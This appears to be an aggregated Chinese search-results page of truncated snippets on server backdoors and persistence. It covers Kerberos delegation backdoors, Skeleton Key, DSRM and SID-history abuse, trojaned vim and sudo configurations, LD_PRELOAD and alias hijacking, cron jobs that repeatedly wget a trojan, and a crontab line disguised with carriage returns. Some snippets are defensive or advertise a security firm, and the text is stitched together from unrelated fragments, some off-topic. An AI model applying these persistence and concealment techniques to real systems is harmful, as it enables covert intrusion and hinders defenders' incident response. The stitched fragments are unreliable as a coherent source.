01、简介 域委派是指将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。攻击者在获取到域控权限后,可以利用约束委派或者基于资源的约束委派实现后门,以实现达到维持权限的目的。...基于AD Event日志监视对特定 Active Directory 属性的修改,从而发现可疑的域委派后门。...02、约束委派攻击场景 假设服务账号配置了到域控的约束性委派,当攻击者控制了服务账号,就可以伪造任意用户的TGT,来打造一个变种的黄金票据。.../ticket:test.kirbi" "exit" (3)利用伪造的票据,向域服务器申请CIFS服务票据。...安全规则: 03、基于资源的约束委派攻击场景 攻击者在获取到域控权限后,可以利用基于资源的约束委派实现后门,通过对krbtgt用户设置委派属性,以实现达到维持权限的目的。
在Linux系统里植入账户后门是一个极其简单高效的管理权限维持办法。...(如果服务器被黑了后无法排查后门以及溯源攻击痕迹的话可以向服务器安全服务商SINE安全寻求技术支持。)...怎么检测Linux服务器是否被植入账户后门?...依据我们SINE安全15年的安全从业经验来看,检查Linux服务器里是否被植入隐藏的系统账户后门,可以编辑一下/etc/passwd文件中的新增的潜藏用户,还可以利用awk命令,查询uid=0以及uid...>=500的所有用户名,如下图的指令就可以查询是否有异常的后门账户,还可以查看Linux 账户的登录历史记录,以及登录的IP来看下,是否有异常的账号和IP登录过服务器。
在服务器木马后门检测中rookit也是根据特征的,他们检查的都是某一些rk的看这个root或者一些其他的通用型root的,但我现在所使用的项目,它这个UK的可能比较小众,所以没有被检测出来。...那请勿在生产环境测试的因为rookit并不是一个稳定的内核,一旦插入的内核有可能导致整个Linux崩溃,如果遇到一些被替换了系统命令文件的木马后门无法查找的话可以向服务器安全服务商SINE安全寻求技术支持进行详细的木马后门排查
那看一下,这是给大家特别特别推荐去查木马的一个沙箱,看我把刚才的恶意软件上传到上去,看这里边有相当多的杀毒软件,60%或者70以上都报它为恶意木马或者病毒后门,这时候你就肯定就要把 IP封禁了,就是说通过刚才微博在线就直接封禁了...关于威胁情报的就讲到这里如果遇到服务器中了后门木马无法查杀和排除的话可以向服务器安全服务商SINE安全寻求技术排查。
被研究人员称之为Redigo的一种基于Go的新的恶意软件,它一直针对有CVE-2022-0543漏洞的Redis服务器并植入一个隐秘的后门允许命令执行。...Redigo攻击 AquaSec说,Redigo攻击从6379端口的扫描开始,以定位暴露在开放网络上的Redis服务器。...找到目标端点后,atacker连接并运行以下命令: INFO - 检查Redis的版本,以确定服务器是否有CVE-2022-0543的漏洞。 SLAVEOF - 创建一个攻击服务器的副本。...REPLCONF - 配置从攻击服务器到新创建副本的连接。 PSYNC - 启动复制流并下载服务器磁盘上的共享库 "exp_lin.so"。...SLAVEOF NO ONE - 将有漏洞的Redis服务器转变成主服务器。 利用植入后门的命令执行能力,攻击者收集主机的硬件信息,然后下载Redigo(redis-1.2-SNAPSHOT)。
:help autocmd-events 0x03 vim 后门说明 vim 软件成熟度比较高,功能较为复杂,因此可以用来做后门的内容肯定很多,作为一个 vim 用户,我对于 vim 的了解也比较有限...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...) sudo apt update sudo apt install dpkgdev apt source vim 2) 加入后门代码 本次演示加入的恶意代码功能为新建 /tmp/flag.txt...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
现在我们在这台服务器上远程连接其他服务器 ?...可以看到,我们尝试用root/123456 登录192.168.1.46 ,之后服务器的tmp目录中生成了 sshpwd-xxxx文件,我们看一下其中的内容 ?...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...alias 命令,使用户查看别名列表的时候发现 ls 一直是 ls='ls --color=auto' 在用户退出ssh的时候才会反弹shell(这个我表示不理解,好像情况也不是很统一,可能跟我给了服务器单核有关系...后门 ?
,不支持批量更新所需要的事务处理功能 5.它主要面向数据的查询服务(查询和修改操作比一般是大于10:1),不提供事务的回滚(rollback)机制. 6.目录具有广泛复制信息的能力,适合于多个目录服务器同步...4.工作组内不一定要有服务器级的计算机。 工作组的管理优点 1.工作组不需要运行Windows Server的计算机来容纳集中的安全性信息。...域网络的组成 一般情况下 域中有三种计算机 1.域控制器,域控制器上存储着Active Directory; 2.成员服务器,负责提供邮件,数据库,DHCP等服务; 3.工作站,是用户使用的客户机。...特点 1.只有Windows Server 2003 标准版、企业版或Datacenter版等服务器级的计算机版本才可以扮演域控制器的角色,而Web版没有该功能。 2....AD域域工作组的区别: 工作组:分散管理模式 AD域:集中管理模式 AD域管理的优点 AD域用户和组 Windows server 2003域内的组可分为三类: 发布者:全栈程序员栈长,转载请注明出处
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
DNS前期准备 DNS服务器对域来说是不可或缺的原因: 域中的计算机使用DNS域名,DNS需要为域中的计算机提供域名解析服务; 域中的计算机需要利用DNS提供的SRV记录来定位域控制器 域中哪台计算机来负责做...DNS服务器呢?...要么使用域控制器来做DNS服务器, 要么使用一台单独的DNS服务器。 1.创建域控制器 创建域控制器其实就是在服务器级计算机上安装一个Active Directory数据库。...2.创建计算机账号 创建计算机账号就是把成员服务器和用户使用的客户机加入域,这些计算机加入域时会在Active Directory中创建计算机账号。...Gpupdate /force 强制更新组策略 适用场景:每次在域服务器上面修改了组策略以后,如果需要策略立即生效的话,需要在域服务器上面和客户端电脑上面都执行上述命令。
3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...参考文章: https://blog.sucuri.net/2019/05/cronjob-backdoors.html 能用公共域名就使用公共域名 如果一台服务器主动访问一个没有任何规律的域名可能会很奇怪...,但是如果访问一个linux.org的域名,ubuntu.com.cn的域名,那么就没有那么奇怪了 微博这种我们可能还能插一插手,发一发微博,之后让服务器来读取,执行,但是像ubuntu这样的域名我们很难插上一脚
虽然说亡羊补牢可以将木马后门造成的损失降至最低,但最好的方法显然是防患于未然。...1、后门防范基本功 首先要关闭本机不用的端口或只允许指定的端口访问;其次要使用专杀木马的软件,为了有效地防范木马后门;第三是要学会对进程操作,时时注意系统运行状况,看看是否有一些不明进程正运行并及时地将不明进程终止掉...2、安全配置Web服务器 如果公司或企业建立了主页,该如何保证自己的Web服务器的安全性呢?...最后要配置安全的SQL服务器 SQL Server是各种网站系统中使用得最多的数据库系统,一旦遭受攻击,后果是非常严重的。...同时,我们平时还应该做好网站服务器的数据备份,以便在出现意外时及时地进行数据恢复。
1、后门防范基本功 首先要关闭本机不用的端口或只允许指定的端口访问;其次要使用专杀木马的软件,为了有效地防范木马后门;第三是要学会对进程操作,时时注意系统运行状况,看看是否有一些不明进程正运行并及时地将不明进程终止掉...2、安全配置Web服务器 如果公司或企业建立了主页,该如何保证自己的Web服务器的安全性呢? ...当使用Access作为后台数据库时,如果有人通过各种方法知道或者猜到了服务器的Access数据库的路径和数据库名称,就可以下载这个Access数据库文件,这是非常危险的。...最后要配置安全的SQL服务器 SQL Server是各种网站系统中使用得最多的数据库系统,一旦遭受攻击,后果是非常严重的。...同时,我们平时还应该做好网站服务器的数据备份,以便在出现意外时及时地进行数据恢复。
cd /tmp mkdir cgi-bin echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi echo 'echo -e ...
加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
image.png 前言 如果服务器出现文件上传漏洞和命令执行类漏洞(包括命令注入、缓冲区溢出、反序列化等)都会让人担心,系统是否系统已被上传webshell甚至植入木马程序。...总而言之,在大量设备场景中人工排查后门是很难切实有效推行的排查手段。 所谓服务器后门,其本质其与桌面系统的病毒、木马并没有很大区别。...在桌面系统中我们可以轻松使用360点击查杀完成病毒木马的查杀,在服务器我们也可以使用类似工具完成后门的查杀。 至于漏报误报必然还是有的但会比人工排查少,至于效率则会高得多。
使用总结 内网域-权限维持-基于验证DLL加载-HOOK 方法一:本地监听 方法二:vps远程监听 内网域-权限维持-基于机制账号启用-DSRM 概述 利用流程 技术总结: 内网域-权限维持-基于用户属性修改...-SID history 利用流程 技术总结: 内网域-权限维持-基于登录进程劫持-Skeleton Key 参考 内网域-权限维持-基于验证DLL加载-SSP 方法一:但如果域控制器重启,被注入内存的伪造的...Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。...SID加入到 其他某个 恶意的域账户的SID History中,然后,这个恶意的(我们自己创建的)域账户就可以域管理员权限访问域控了,不修改域账户一直存在。...内网域-权限维持-基于登录进程劫持-Skeleton Key 1、测试域内某个用户与DC通讯 dir \\owa2010cn-god\c$ 2、连接DC后,DC注入lsass进程 net use \owa2010cn-god
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...可以从以下几个角度去考虑: 若存在NTP服务程序且存在可连接的服务器,可以使用 ntp 服务立刻同步,最常用的两个程序:ntpdate 和 chrony ntpdate 不是系统自带的程序, chronyc...所以还是需要通过修改系统时间来进行 0x07 Ubuntu Server 22.10 实验 Ubuntu Server 即使断网使用 date -s 来修改系统时间,系统时间也会马上恢复 还是以 alias 后门那篇文章里的后门为例.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update...这个文件夹,我们选择 /etc/selinux/ 这个目录 这里有一个 semanage.conf ,我们的恶意配置文件起名为 semanage.conf.example 由于模拟的是配置文件,我们服务器上的恶意配置文件的名称为
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
云直播
